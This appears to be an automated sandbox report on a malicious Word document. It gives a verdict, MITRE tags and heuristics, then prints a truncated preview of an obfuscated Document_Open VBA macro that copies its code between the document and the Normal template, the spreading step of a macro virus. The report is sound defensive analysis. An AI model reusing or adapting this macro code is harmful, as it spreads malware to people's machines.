Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Win.Trojan.W97M-8. Static analysis detected the presence of VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon document opening. The VBA script is heavily obfuscated, but its presence and the Document_Open trigger strongly suggest it is designed to download and execute a secondary payload.
Heuristics (3)
- ClamAV: Win.Trojan.W97M-8 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.W97M-8
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 85374 bytes |

SHA-256: 5b9d93a814451ab4a2ba985fc21abc16a9e394cb3b3dc9d31d237313b3808bed

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
ľĎÍ‹¸†şšä Ž´ĐĂçۇ¬Ăâć» = "©ęčÚŁŔŔ˛"
±ŽÔŠ×ÄŚ = "ÔńÁΓ”ĄÚÇÁ"
ׂ´®ĆśĘŤÚčęÔ = "�Ť«đŁŻé"
ąđ”ŚÁę»˝’—’”�Ş˛ĺ�ÜŇď’ÜŘŠĚ“ŚáĚŃ÷ÂíŁŐđŢŕʱ‡ë = "§ĎŮ‹ëĹŢ«ą¸č˝»őáłćŢ"
ŢNJDZőë‡Ű𮛸Âę°•čÜĄöË„±›ň߸µîᗤǣ = "¤ç˝„‹‰â—żÚ"
ÚÉÚą‡ß„ş¦�ť˝ŇôąŐŰ�‘ = "ń÷ě®çŔŕßĺ·ť÷ŘéČĂĆö”"
äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬‰Ę�’Č‹łÜ˘ś”ŚŻ…�í = "Ů”«őŻśů"
ŻúđŤŕňµ‰«ôéˡČ÷ÝĎě¤ĎęČżˇŞşäĆ = "Ś"
ŹÄ©¨ÄĆł•˘Î뵟‡™ůŃĹŃÔŠść奝¸�ô±¦«Śť„ = "µŘŕßĵ�˛–ěÁ"
Ó핯ćËřľŻŘČźź†ľ†ŐŚ§Ô¨ˇŁ�ĐĽî–™Ŕ÷ĺ𫚚ń = "ĽăĂíÉĘŤ´ă¤ôó"
öř¨¨ő = "ň"
�Ţθ°Č¸î¶˛´·ë = "«ę§íżµĘä«ŔÇďĂ•·Čö˘ň"
ßťŻŇÉÍô‡Ő ČďŕŽŮ–̜ŘŢĂžęô‰ńÔ«â = "˛žĚ"
··¨ű¦Ú›Ŕ®†ŕŐÍ•Ą÷ĽÂÁÜʨ̣Á–í¸ö…˛źŁ¦Ň˛§µ = "šËçÍöˇ• ¸"
…Шš§Éžö´ˇď�Ŕ·›ˇÚäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬â“•úÇąÔŕĄŢ÷ö±Č = "¸íľŞÄ"
öř¨¨Č‚±¦§ŚÎú÷Íś�Ő»Ž« = "Ďß…ÚŹăĹä쏯¸"
ČúôŞňÎú¸Ŕ‹Ţ�Ę™»×»ěéɸ Ö”úů™›ćóŞŠĽ©ŇըЄóŕŚ”ś‰čőáÔ™§±¸ = "ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�˝äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬…ńµťÖÖ"
¦‚ŠÁęɦµŮż ň¤çÁÚ†żčňÇ’‚Žë„ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�„Ô݉™ŻŐč´ÓÖ±¤ = "ŕßÓכ˝±„„“�Ę�"
¬¶�ʶ“‘»ŁđÂƤ”Ě‹ČŕŽ›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜŤˇ¤ľšÉˇä̛ŦËé = "”뎱”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ŽĹň"
Çôű«ĺÔšĹÇÉěŔĽˇĂË´ŤŔšźŞČŘŽäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬˝Úá°”ľŰšŽŢĹ”ĎÁĹť = "íéćůĘ›Ŕ‘„Ů»žă"
Ş”ßŇťË¨Ž±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�áŃźúť䉵鹇‡‹ľÁ‡˝ĽÚ‚¦ = "˛ŹŃ˛‚–ܡ츔˝ĎÓ¶Ž"
ĐäÇŻľďžŹ…Ó”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�‡ŁĄ�ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�Ő×˝¸ĘŽďäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬ = "ŹşŮŞ"
ß‹ČäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĎŠřô†ĚźˇľąůŠŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�™Ýŕ–ßÝ�Ó‰Ýç„…ě˝ŕë = "»ď��äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬Ëđ©�ŹŻ§ŹŁÔ"
’čĐ“†ůŕĆŹ’›…„§ŻäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬»˝éş = "ˇ›ę´Ž±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ąó‹™×ď˛đ�"
ÇéŰęÝô¨í‚¸ô‡ËĆčçąŮťęŰŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�Ň쵚„Ţ = "�އᱥŞ"
�Űׂ´®Ćö˝˝öů–›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĽÚěÜčČéµůĚŰ–ň”Ä = "§›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü“ö•éצµľ„§äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬ë"
�Űׂ´®Ćö˝˝öů–›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĽÚěÜčČéµ×‚´®ĆÚôׂ´®Ćި踖жňŮ = "¦ÜßçĹŔĎ‘Żť¨Ë�"
Ýĺ ›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Üę«öř¨¨Ž±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ŞĘޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ş¬Ş×‚´®Ć‚ëظžµŮ˘ÉЬŔ‡Î©÷Ű’Čš×őř«Ú¤±•÷Ż…ŚĚŽĺ›¨ = "Źé´¶ŽÂ™źâⵞ§äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬†ž†ĘŚ‘±ŕ�°ęžâŢ߸â–âă’ęđĄáĺ¨Ý“çáń™ńÄßŔ˝…ąŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ęćơŰ"
�Űׂ´®Ćö˝˝öů–›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĽÚěÜčČéµĆ¨ĺڥׂ´®Ć˘Ôş›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Üď = "´�ĶźÂő§ö˘ďç"
ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
§Ô†ń…ÖŚôŮ = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = True
WordBasic.DisableAutoMacros 1
Options.SaveNormalPrompt = True
If ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� > 169 And §Ô†ń…ÖŚôŮ > 169 Then Exit Sub
If §Ô†ń…ÖŚôŮ > 169 Then
Set ЬŔ‡Î©÷Ű’Čš×őř«Ú¤±•÷Ż…ŚĚŽĺ› = ActiveDocument
Set ±÷żřĘŔźř路Ą�ŕ = NormalTemplate
GoTo •öř¨¨Ę¨Ä ÖĚÓŮŁˇµ�ÁŔŇé§’ë ±ĺ
End If
If §Ô†ń…ÖŚôŮ < 170 Then
Set ЬŔ‡Î©÷Ű’Čš×őř«Ú¤±•÷Ż…ŚĚŽĺ› = NormalTemplate
Set ±÷żřĘŔźř路Ą�ŕ = ActiveDocument
End If
ReDim Öׂ´®Ć¦šŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ľĆëÝćł�ł–¦¶“đĄĹĹéß(50, 50)
›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü = ±÷żřĘŔźř路Ą�ŕ.VBProject.VBComponents(1).CodeModule.countoflines
ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = 0
Do Until ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = ›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü
ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� + 1
ĐäÇŻľďžŹ…Óîׂ´®Ć‡ŁĄ�ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�Ő×˝¸ = ±÷żřĘŔźř路Ą�ŕ.VBProject.VBComponents(1).CodeModule.Lines(ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉ
... (truncated)